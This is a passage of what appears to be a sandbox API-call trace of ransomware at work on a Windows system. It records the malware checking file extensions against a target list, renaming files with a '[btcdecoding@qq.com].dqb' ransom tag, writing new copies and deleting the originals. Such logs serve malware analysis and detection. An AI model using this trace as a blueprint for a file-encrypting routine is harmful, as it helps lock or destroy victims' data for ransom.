0xffffffff [0036.984] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0036.984] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0036.984] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0036.984] lstrlenW (lpString=".doc") returned 4 [0036.984] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0036.984] lstrlenW (lpString=".docx") returned 5 [0036.984] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0036.984] lstrlenW (lpString=".pdf") returned 4 [0036.984] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0036.984] lstrlenW (lpString=".xls") returned 4 [0036.984] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0036.984] lstrlenW (lpString=".xlsx") returned 5 [0036.984] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0036.984] lstrlenW (lpString=".ppt") returned 4 [0036.984] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0036.984] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0036.984] lstrlenW (lpString=".zip") returned 4 [0036.984] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0036.984] lstrlenW (lpString=".rar") returned 4 [0036.985] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0036.985] lstrlenW (lpString=".bz2") returned 4 [0036.985] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0036.985] lstrlenW (lpString=".7z") returned 3 [0036.985] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0036.985] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0036.985] lstrlenW (lpString=".dbf") returned 4 [0036.985] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0036.985] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0036.985] lstrlenW (lpString=".1cd") returned 4 [0036.985] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0036.985] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0036.985] lstrlenW (lpString=".jpg") returned 4 [0036.985] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0036.985] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0036.985] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0036.985] lstrlenW (lpString=".doc") returned 4 [0036.985] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0036.985] lstrlenW (lpString=".docx") returned 5 [0036.985] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0036.985] lstrlenW (lpString=".pdf") returned 4 [0036.985] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0036.985] lstrlenW (lpString=".xls") returned 4 [0036.985] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0036.985] lstrlenW (lpString=".xlsx") returned 5 [0036.985] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0036.985] lstrlenW (lpString=".ppt") returned 4 [0036.985] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0036.985] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0036.985] lstrlenW (lpString=".zip") returned 4 [0036.985] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0036.985] lstrlenW (lpString=".rar") returned 4 [0036.985] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0036.985] lstrlenW (lpString=".bz2") returned 4 [0036.985] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0036.986] lstrlenW (lpString=".7z") returned 3 [0036.986] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0036.986] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0036.986] lstrlenW (lpString=".dbf") returned 4 [0036.986] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0036.986] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0036.986] lstrlenW (lpString=".1cd") returned 4 [0036.986] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0036.986] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0036.986] lstrlenW (lpString=".jpg") returned 4 [0036.986] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0036.986] lstrcmpiW (lpString1=".avi", lpString2=".dqb") returned -1 [0036.986] lstrlenW (lpString="FlickAnimation.avi") returned 18 [0036.986] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0036.986] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=1600388) returned 1 [0036.986] CloseHandle (hObject=0x180) returned 1 [0036.986] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi")) returned 0x20 [0036.987] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0036.987] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0036.987] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0036.987] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0036.987] lstrlenW (lpString=".doc") returned 4 [0036.987] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0036.987] lstrlenW (lpString=".docx") returned 5 [0036.987] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0036.987] lstrlenW (lpString=".pdf") returned 4 [0036.987] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0036.987] lstrlenW (lpString=".xls") returned 4 [0036.987] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0036.987] lstrlenW (lpString=".xlsx") returned 5 [0036.987] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0036.987] lstrlenW (lpString=".ppt") returned 4 [0036.987] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0036.987] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0036.987] lstrlenW (lpString=".zip") returned 4 [0036.987] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0036.987] lstrlenW (lpString=".rar") returned 4 [0036.987] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0036.987] lstrlenW (lpString=".bz2") returned 4 [0036.987] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0036.987] lstrlenW (lpString=".7z") returned 3 [0036.987] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0036.987] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0036.987] lstrlenW (lpString=".dbf") returned 4 [0036.987] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0036.987] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0036.987] lstrlenW (lpString=".1cd") returned 4 [0036.987] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0036.987] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0036.988] lstrlenW (lpString=".jpg") returned 4 [0036.988] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0036.988] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0036.988] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0036.988] lstrlenW (lpString=".doc") returned 4 [0036.988] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0036.988] lstrlenW (lpString=".docx") returned 5 [0036.988] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0036.988] lstrlenW (lpString=".pdf") returned 4 [0036.988] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0036.988] lstrlenW (lpString=".xls") returned 4 [0036.988] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0036.988] lstrlenW (lpString=".xlsx") returned 5 [0036.988] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0036.988] lstrlenW (lpString=".ppt") returned 4 [0036.988] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0036.988] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0036.988] lstrlenW (lpString=".zip") returned 4 [0036.988] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0036.988] lstrlenW (lpString=".rar") returned 4 [0036.988] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0036.988] lstrlenW (lpString=".bz2") returned 4 [0036.988] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0036.988] lstrlenW (lpString=".7z") returned 3 [0036.988] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0036.988] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0036.988] lstrlenW (lpString=".dbf") returned 4 [0036.988] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0036.988] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0036.988] lstrlenW (lpString=".1cd") returned 4 [0036.988] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0036.988] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0036.988] lstrlenW (lpString=".jpg") returned 4 [0036.988] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0036.989] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0036.989] lstrlenW (lpString="auxbase.xml") returned 11 [0036.989] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0036.989] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=1434) returned 1 [0036.989] CloseHandle (hObject=0x180) returned 1 [0036.990] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml")) returned 0x20 [0036.990] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0036.990] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0036.990] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0036.990] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0036.990] lstrlenW (lpString=".doc") returned 4 [0036.990] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.990] lstrlenW (lpString=".docx") returned 5 [0036.990] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0036.990] lstrlenW (lpString=".pdf") returned 4 [0036.990] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.990] lstrlenW (lpString=".xls") returned 4 [0036.990] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.990] lstrlenW (lpString=".xlsx") returned 5 [0036.990] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0036.990] lstrlenW (lpString=".ppt") returned 4 [0036.990] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.990] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0036.990] lstrlenW (lpString=".zip") returned 4 [0036.990] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.990] lstrlenW (lpString=".rar") returned 4 [0036.990] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.990] lstrlenW (lpString=".bz2") returned 4 [0036.990] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.990] lstrlenW (lpString=".7z") returned 3 [0036.990] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.990] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0036.990] lstrlenW (lpString=".dbf") returned 4 [0036.990] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.990] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0036.990] lstrlenW (lpString=".1cd") returned 4 [0036.991] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.991] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0036.991] lstrlenW (lpString=".jpg") returned 4 [0036.991] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.991] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0036.991] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0036.991] lstrlenW (lpString=".doc") returned 4 [0036.991] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.991] lstrlenW (lpString=".docx") returned 5 [0036.991] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0036.991] lstrlenW (lpString=".pdf") returned 4 [0036.991] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.991] lstrlenW (lpString=".xls") returned 4 [0036.991] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.991] lstrlenW (lpString=".xlsx") returned 5 [0036.991] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0036.991] lstrlenW (lpString=".ppt") returned 4 [0036.991] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.991] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0036.991] lstrlenW (lpString=".zip") returned 4 [0036.991] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.991] lstrlenW (lpString=".rar") returned 4 [0036.991] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.991] lstrlenW (lpString=".bz2") returned 4 [0036.991] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.991] lstrlenW (lpString=".7z") returned 3 [0036.991] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.991] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0036.991] lstrlenW (lpString=".dbf") returned 4 [0036.991] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.991] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0036.991] lstrlenW (lpString=".1cd") returned 4 [0036.991] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.991] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0036.991] lstrlenW (lpString=".jpg") returned 4 [0036.991] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.992] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0036.992] lstrlenW (lpString="auxpad.xml") returned 10 [0036.992] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0036.992] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=212) returned 1 [0036.992] CloseHandle (hObject=0x180) returned 1 [0036.993] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml")) returned 0x20 [0036.993] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0036.993] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0036.993] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0036.993] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0036.993] lstrlenW (lpString=".doc") returned 4 [0036.993] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.993] lstrlenW (lpString=".docx") returned 5 [0036.993] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0036.993] lstrlenW (lpString=".pdf") returned 4 [0036.993] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.993] lstrlenW (lpString=".xls") returned 4 [0036.993] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.993] lstrlenW (lpString=".xlsx") returned 5 [0036.993] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0036.993] lstrlenW (lpString=".ppt") returned 4 [0036.993] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.993] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0036.993] lstrlenW (lpString=".zip") returned 4 [0036.993] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.993] lstrlenW (lpString=".rar") returned 4 [0036.993] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.993] lstrlenW (lpString=".bz2") returned 4 [0036.993] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.993] lstrlenW (lpString=".7z") returned 3 [0036.993] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.993] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0036.993] lstrlenW (lpString=".dbf") returned 4 [0036.993] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.018] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0037.018] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0037.019] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0037.019] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0037.232] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0037.232] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0037.232] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0037.232] GetLastError () returned 0x0 [0037.232] ReadFile (in: hFile=0x1c0, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x795, lpOverlapped=0x0) returned 1 [0037.242] WriteFile (in: hFile=0x1c4, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x7a0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x7a0, lpOverlapped=0x0) returned 1 [0037.242] ReadFile (in: hFile=0x1c0, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0037.242] WriteFile (in: hFile=0x1c4, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xe8, lpOverlapped=0x0) returned 1 [0037.243] SetEndOfFile (hFile=0x1c4) returned 1 [0037.243] CloseHandle (hObject=0x1c4) returned 1 [0037.245] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0037.245] SetEndOfFile (hFile=0x1c0) returned 1 [0037.246] CloseHandle (hObject=0x1c0) returned 1 [0037.246] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0037.246] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm")) returned 1 [0037.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.246] lstrlenW (lpString=".doc") returned 4 [0037.246] lstrcmpiW (lpString1=".doc", lpString2=".HTM") returned -1 [0037.247] lstrlenW (lpString=".docx") returned 5 [0037.247] lstrcmpiW (lpString1=".docx", lpString2="E.HTM") returned -1 [0037.247] lstrlenW (lpString=".pdf") returned 4 [0037.247] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1 [0037.247] lstrlenW (lpString=".xls") returned 4 [0037.247] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1 [0037.247] lstrlenW (lpString=".xlsx") returned 5 [0037.247] lstrcmpiW (lpString1=".xlsx", lpString2="E.HTM") returned -1 [0037.247] lstrlenW (lpString=".ppt") returned 4 [0037.247] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1 [0037.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.247] lstrlenW (lpString=".zip") returned 4 [0037.247] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1 [0037.247] lstrlenW (lpString=".rar") returned 4 [0037.247] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1 [0037.247] lstrlenW (lpString=".bz2") returned 4 [0037.247] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1 [0037.247] lstrlenW (lpString=".7z") returned 3 [0037.247] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1 [0037.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.247] lstrlenW (lpString=".dbf") returned 4 [0037.247] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1 [0037.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.247] lstrlenW (lpString=".1cd") returned 4 [0037.247] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1 [0037.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 